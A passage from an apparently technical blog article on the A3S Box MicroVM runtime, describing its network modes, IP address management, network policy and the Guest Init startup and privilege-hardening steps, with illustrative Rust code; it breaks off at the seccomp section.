    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;config_url&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// URL of the config blob&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;manifest_url&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// URL of the manifest&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The push flow follows the OCI Distribution Spec: upload config blob and layer blobs first, then upload the manifest.&lt;/p&gt;




&lt;h2&gt;
  
  
  13. Network Architecture: Three Flexible Modes
&lt;/h2&gt;

&lt;h3&gt;
  
  
  13.1 Network Mode Overview
&lt;/h3&gt;

&lt;p&gt;MicroVM network configuration requires balancing security, performance, and ease of use. A3S Box provides three network modes covering different scenarios from development to production:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;NetworkMode&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;Tsi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                        &lt;span class="c1"&gt;// Default: transparent socket proxy&lt;/span&gt;
    &lt;span class="n"&gt;Bridge&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;network&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="c1"&gt;// Bridge: real network interface&lt;/span&gt;
    &lt;span class="nb"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                       &lt;span class="c1"&gt;// No networking&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  13.2 TSI Mode (Default)
&lt;/h3&gt;

&lt;p&gt;TSI (Transparent Socket Interception) is A3S Box's default network mode. In this mode, socket syscalls inside the MicroVM are transparently proxied to the host — the MicroVM doesn't need its own network interface, IP address, or routing table.&lt;/p&gt;

&lt;p&gt;How it works:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Inside MicroVM                  Host
+--------------+              +--------------+
| App calls    |              |              |
| connect()    |---- vsock --&amp;gt;| Proxy connect()|---&amp;gt; Target server
| send()       |---- vsock --&amp;gt;| Proxy send()  |---&amp;gt;
| recv()       |&amp;lt;--- vsock ---| Proxy recv()  |&amp;lt;---
+--------------+              +--------------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;TSI advantages:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Zero configuration&lt;/strong&gt;: No need to create networks, assign IPs, configure routes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secure&lt;/strong&gt;: MicroVM has no direct network interface, reducing attack surface&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simple&lt;/strong&gt;: Suitable for most development and testing scenarios&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;TSI limitations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Does not support direct communication between MicroVMs&lt;/li&gt;
&lt;li&gt;Does not support listening on ports (inbound connections require port mapping)&lt;/li&gt;
&lt;li&gt;Slightly lower performance than bridge mode (extra proxy layer)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  13.3 Bridge Mode
&lt;/h3&gt;

&lt;p&gt;Bridge mode provides MicroVMs with a real network interface (&lt;code&gt;eth0&lt;/code&gt;), implementing a userspace network stack via the &lt;code&gt;passt&lt;/code&gt; daemon. This mode is suitable for scenarios requiring inter-MicroVM communication or full network functionality.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;MicroVM A                     Host                        MicroVM B
+----------+                +---------+                +----------+
| eth0     |                | PasstMgr|                | eth0     |
| 10.0.1.2 |&amp;lt;-- virtio --&amp;gt;| Bridge  |&amp;lt;-- virtio --&amp;gt;| 10.0.1.3 |
+----------+                +---------+                +----------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Bridge mode network configuration is injected into Guest Init via environment variables:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Environment Variable&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_NET_IP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;MicroVM IP address&lt;/td&gt;
&lt;td&gt;&lt;code&gt;10.0.1.2/24&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_NET_GATEWAY&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Gateway address&lt;/td&gt;
&lt;td&gt;&lt;code&gt;10.0.1.1&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;A3S_NET_DNS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;DNS server&lt;/td&gt;
&lt;td&gt;&lt;code&gt;8.8.8.8&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Guest Init configures the network interface at startup via raw syscalls (no dependency on &lt;code&gt;iproute2&lt;/code&gt;).&lt;/p&gt;

&lt;h3&gt;
  
  
  13.4 Network Configuration and IPAM
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;NetworkConfig&lt;/code&gt; defines a complete network:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;NetworkConfig&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;subnet&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// CIDR format, e.g., "10.0.1.0/24"&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;gateway&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Ipv4Addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="c1"&gt;// Gateway address&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;driver&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Default "bridge"&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;labels&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;HashMap&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;endpoints&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;HashMap&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;NetworkEndpoint&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;policy&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;NetworkPolicy&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;created_at&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;DateTime&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;Utc&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The IPAM (IP Address Management) module handles automatic IP address allocation:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;IPv4 IPAM&lt;/strong&gt; (&lt;code&gt;Ipam&lt;/code&gt;): Allocates sequentially from CIDR, skipping network address, gateway address, and broadcast address. Supports subnets with prefix length &amp;lt;= 30.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;IPv6 IPAM&lt;/strong&gt; (&lt;code&gt;Ipam6&lt;/code&gt;): Supports IPv6 subnets with prefix length 64-120.&lt;/li&gt;
&lt;/ul&gt;
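
&lt;p&gt;As a rough sketch of how such sequential allocation behaves (the type and method names here are illustrative assumptions, not the actual &lt;code&gt;Ipam&lt;/code&gt; API):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;use std::collections::HashSet;
use std::net::Ipv4Addr;

// Illustrative sketch: hand out host addresses sequentially from a
// subnet, skipping the network, gateway, and broadcast addresses.
struct SimpleIpam {
    network: u32,            // network address, e.g. 10.0.1.0
    prefix: u32,             // prefix length, at most 30
    gateway: u32,
    allocated: HashSet&amp;lt;u32&amp;gt;,
}

impl SimpleIpam {
    fn allocate(&amp;amp;mut self) -&amp;gt; Option&amp;lt;Ipv4Addr&amp;gt; {
        let broadcast = self.network + (1u32 &amp;lt;&amp;lt; (32 - self.prefix)) - 1;
        // First candidate is network + 1; the broadcast address is excluded.
        for addr in (self.network + 1)..broadcast {
            if addr == self.gateway || self.allocated.contains(&amp;amp;addr) {
                continue;
            }
            self.allocated.insert(addr);
            return Some(Ipv4Addr::from(addr));
        }
        None // subnet exhausted
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;For &lt;code&gt;10.0.1.0/24&lt;/code&gt; with gateway &lt;code&gt;10.0.1.1&lt;/code&gt;, the first two calls yield &lt;code&gt;10.0.1.2&lt;/code&gt; and &lt;code&gt;10.0.1.3&lt;/code&gt;.&lt;/p&gt;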

&lt;p&gt;MAC address generation uses a Docker-compatible deterministic algorithm: derived from the IP address, using the &lt;code&gt;02:42:xx:xx:xx:xx&lt;/code&gt; prefix. This ensures the same IP always maps to the same MAC address, avoiding ARP cache inconsistency issues.&lt;/p&gt;
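
&lt;p&gt;The scheme fits in a few lines (the function name is mine, for illustration):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;use std::net::Ipv4Addr;

// Deterministic, Docker-compatible MAC: the locally administered
// 02:42 prefix followed by the four IPv4 octets.
fn mac_for_ip(ip: Ipv4Addr) -&amp;gt; String {
    let o = ip.octets();
    format!("02:42:{:02x}:{:02x}:{:02x}:{:02x}", o[0], o[1], o[2], o[3])
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;code&gt;mac_for_ip(Ipv4Addr::new(10, 0, 1, 2))&lt;/code&gt; returns &lt;code&gt;"02:42:0a:00:01:02"&lt;/code&gt;.&lt;/p&gt;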

&lt;h3&gt;
  
  
  13.5 Network Policy
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;NetworkPolicy&lt;/code&gt; provides inter-MicroVM network isolation control:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;NetworkPolicy&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;isolation&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;IsolationMode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;ingress&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;PolicyRule&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;egress&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;PolicyRule&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;IsolationMode&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// Default: all MicroVMs can communicate with each other&lt;/span&gt;
    &lt;span class="n"&gt;Strict&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// Full isolation: prohibit inter-MicroVM communication&lt;/span&gt;
    &lt;span class="n"&gt;Custom&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// Custom: rule-based access control&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;PolicyRule&lt;/code&gt; supports flexible rule definitions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;PolicyRule&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;from&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;         &lt;span class="c1"&gt;// Source (supports wildcard "*")&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;           &lt;span class="c1"&gt;// Destination&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;ports&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u16&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;      &lt;span class="c1"&gt;// Port list&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;protocol&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;     &lt;span class="c1"&gt;// "tcp" / "udp" / "any"&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;action&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;PolicyAction&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// Allow / Deny&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Custom mode uses first-match-wins rule evaluation, with default deny for unmatched traffic.&lt;/p&gt;
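
&lt;p&gt;The first-match-wins evaluation with default deny can be sketched as follows (simplified field types; this mirrors the struct above but is not the actual implementation):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;#[derive(PartialEq)]
enum PolicyAction { Allow, Deny }

struct PolicyRule {
    from: String,        // "*" matches any source
    to: String,          // "*" matches any destination
    ports: Vec&amp;lt;u16&amp;gt;,     // empty = any port
    action: PolicyAction,
}

// First matching rule decides; unmatched traffic is denied by default.
fn is_allowed(rules: &amp;amp;[PolicyRule], from: &amp;amp;str, to: &amp;amp;str, port: u16) -&amp;gt; bool {
    for r in rules {
        let src_ok = r.from == "*" || r.from == from;
        let dst_ok = r.to == "*" || r.to == to;
        let port_ok = r.ports.is_empty() || r.ports.contains(&amp;amp;port);
        if src_ok &amp;amp;&amp;amp; dst_ok &amp;amp;&amp;amp; port_ok {
            return r.action == PolicyAction::Allow;
        }
    }
    false // default deny
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;With a single rule allowing any source to reach &lt;code&gt;db&lt;/code&gt; on port 5432, traffic to port 22 falls through every rule and is denied.&lt;/p&gt;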

&lt;h3&gt;
  
  
  13.6 DNS Discovery
&lt;/h3&gt;

&lt;p&gt;In Bridge mode, MicroVMs in the same network can discover each other by DNS name. &lt;code&gt;NetworkConfig&lt;/code&gt; provides two key methods:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;peer_endpoints()&lt;/code&gt;: Returns all endpoints in the same network except itself&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;allowed_peer_endpoints()&lt;/code&gt;: Applies network policy filtering on top of &lt;code&gt;peer_endpoints()&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This makes service discovery in microservice architectures simple — each MicroVM can find other services in the same network by name.&lt;/p&gt;

&lt;h3&gt;
  
  
  13.7 None Mode
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;None&lt;/code&gt; mode completely disables networking — the MicroVM has no network interfaces and cannot perform any network communication. This is suitable for pure compute workloads (such as data processing, cryptographic operations), or scenarios with extreme security requirements needing complete network isolation.&lt;/p&gt;




&lt;h2&gt;
  
  
  14. Guest Init: PID 1 Inside the MicroVM
&lt;/h2&gt;

&lt;h3&gt;
  
  
  14.1 Why a Custom PID 1?
&lt;/h3&gt;

&lt;p&gt;In traditional Linux systems, PID 1 is typically systemd or SysVinit — responsible for mounting filesystems, starting services, and managing process lifecycles. But these general-purpose init systems are too large for MicroVMs: systemd itself has millions of lines of code, introducing unnecessary complexity and attack surface.&lt;/p&gt;

&lt;p&gt;A3S Box's &lt;code&gt;a3s-box-guest-init&lt;/code&gt; is a minimal PID 1 designed specifically for MicroVMs. It is compiled as a statically linked Rust binary with no dependency on any dynamic libraries (libc, libssl, etc.), minimizing attack surface and startup time.&lt;/p&gt;

&lt;h3&gt;
  
  
  14.2 Startup Sequence in Detail
&lt;/h3&gt;

&lt;p&gt;Guest Init's startup sequence is a carefully orchestrated 12-step process:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[Step 1]  Mount base filesystems
          +-- /proc  (procfs)   -- process information
          +-- /sys   (sysfs)    -- kernel/device information
          +-- /dev   (devtmpfs) -- device nodes
          Note: ignore EBUSY errors (kernel may have pre-mounted)

[Step 2]  Mount virtio-fs shared filesystem
          +-- /workspace -- rootfs passed in from host
          +-- User volumes -- configured via BOX_VOL_&amp;lt;index&amp;gt;=&amp;lt;tag&amp;gt;:&amp;lt;guest_path&amp;gt;[:ro]

[Step 3]  Mount tmpfs
          +-- Configured via BOX_TMPFS_&amp;lt;index&amp;gt;=&amp;lt;path&amp;gt;[:&amp;lt;options&amp;gt;]

[Step 4]  Configure guest networking
          +-- configure_guest_network()
              +-- TSI mode: no configuration needed
              +-- Bridge mode: configure eth0 via raw syscalls

[Step 5]  Read-only rootfs (optional)
          +-- If BOX_READONLY=1, remount rootfs as read-only

[Step 6]  Register signal handlers
          +-- SIGTERM -&amp;gt; set SHUTDOWN_REQUESTED (AtomicBool)

[Step 7]  Parse execution configuration
          +-- BOX_EXEC_EXEC    -- executable path
          +-- BOX_EXEC_ARGC    -- argument count
          +-- BOX_EXEC_ARG_&amp;lt;n&amp;gt; -- each argument
          +-- BOX_EXEC_ENV_*   -- environment variables
          +-- BOX_EXEC_WORKDIR -- working directory

[Step 8]  Start container process
          +-- namespace::spawn_isolated()

[Step 9]  Start Exec server thread
          +-- vsock port 4089

[Step 10] Start PTY server thread
          +-- vsock port 4090

[Step 11] Start Attestation server thread (TEE mode only)
          +-- vsock port 4091

[Step 12] Enter main loop
          +-- Reap zombie processes + handle SIGTERM
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  14.3 Process Isolation Strategy
&lt;/h3&gt;

&lt;p&gt;Inside the MicroVM, Guest Init starts the container process via &lt;code&gt;namespace::spawn_isolated()&lt;/code&gt;. Notably, namespace isolation inside the MicroVM is &lt;strong&gt;optional&lt;/strong&gt; — because the VM boundary itself already provides hardware-level isolation.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;NamespaceConfig&lt;/code&gt; defines seven namespace flags:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Namespace&lt;/th&gt;
&lt;th&gt;Function&lt;/th&gt;
&lt;th&gt;Enabled by Default&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Mount&lt;/td&gt;
&lt;td&gt;Filesystem isolation&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PID&lt;/td&gt;
&lt;td&gt;Process ID isolation&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IPC&lt;/td&gt;
&lt;td&gt;Inter-process communication isolation&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UTS&lt;/td&gt;
&lt;td&gt;Hostname isolation&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Net&lt;/td&gt;
&lt;td&gt;Network isolation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User&lt;/td&gt;
&lt;td&gt;User ID isolation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cgroup&lt;/td&gt;
&lt;td&gt;cgroup isolation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Three preset configurations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;default()&lt;/code&gt;: Mount + PID + IPC + UTS (recommended)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;full_isolation()&lt;/code&gt;: All seven namespaces&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;minimal()&lt;/code&gt;: Mount + PID only&lt;/li&gt;
&lt;/ul&gt;
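
&lt;p&gt;Mapped onto &lt;code&gt;clone(2)&lt;/code&gt; flags, the presets look roughly like this (the constants are the standard Linux values; the preset names follow the list above, not necessarily the real API):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;// Standard Linux clone(2) namespace flags.
const CLONE_NEWNS: u64 = 0x0002_0000;     // Mount
const CLONE_NEWCGROUP: u64 = 0x0200_0000; // Cgroup
const CLONE_NEWUTS: u64 = 0x0400_0000;    // UTS
const CLONE_NEWIPC: u64 = 0x0800_0000;    // IPC
const CLONE_NEWUSER: u64 = 0x1000_0000;   // User
const CLONE_NEWPID: u64 = 0x2000_0000;    // PID
const CLONE_NEWNET: u64 = 0x4000_0000;    // Net

fn default_preset() -&amp;gt; u64 {
    CLONE_NEWNS | CLONE_NEWPID | CLONE_NEWIPC | CLONE_NEWUTS
}

fn full_isolation() -&amp;gt; u64 {
    default_preset() | CLONE_NEWNET | CLONE_NEWUSER | CLONE_NEWCGROUP
}

fn minimal() -&amp;gt; u64 {
    CLONE_NEWNS | CLONE_NEWPID
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;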

&lt;h3&gt;
  
  
  14.4 Security Policy Application
&lt;/h3&gt;

&lt;p&gt;Before &lt;code&gt;execvp()&lt;/code&gt;, Guest Init applies three layers of security policy:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 1: PR_SET_NO_NEW_PRIVS&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Using &lt;code&gt;prctl(PR_SET_NO_NEW_PRIVS, 1)&lt;/code&gt; ensures the process and its children cannot gain new privileges via &lt;code&gt;execve()&lt;/code&gt;. This prevents privilege escalation through SUID/SGID binaries.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 2: Capability Stripping&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Linux Capabilities split traditional root's full power into 41 fine-grained capabilities (from &lt;code&gt;CAP_CHOWN&lt;/code&gt;(0) to &lt;code&gt;CAP_CHECKPOINT_RESTORE&lt;/code&gt;(40)). Guest Init strips all Capabilities by default:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Strip all 41 Capabilities&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;cap&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="o"&gt;..=&lt;/span&gt;&lt;span class="mi"&gt;40&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nn"&gt;libc&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;prctl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nn"&gt;libc&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;PR_CAPBSET_DROP&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cap&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="c1"&gt;// Clear ambient and inheritable sets&lt;/span&gt;
&lt;span class="nn"&gt;libc&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;prctl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nn"&gt;libc&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;PR_CAP_AMBIENT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;libc&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;PR_CAP_AMBIENT_CLEAR_ALL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Users can selectively add or remove specific Capabilities via &lt;code&gt;--cap-add&lt;/code&gt; and &lt;code&gt;--cap-drop&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 3: Seccomp BPF Filter&lt;/strong&gt;&lt;/p&gt;
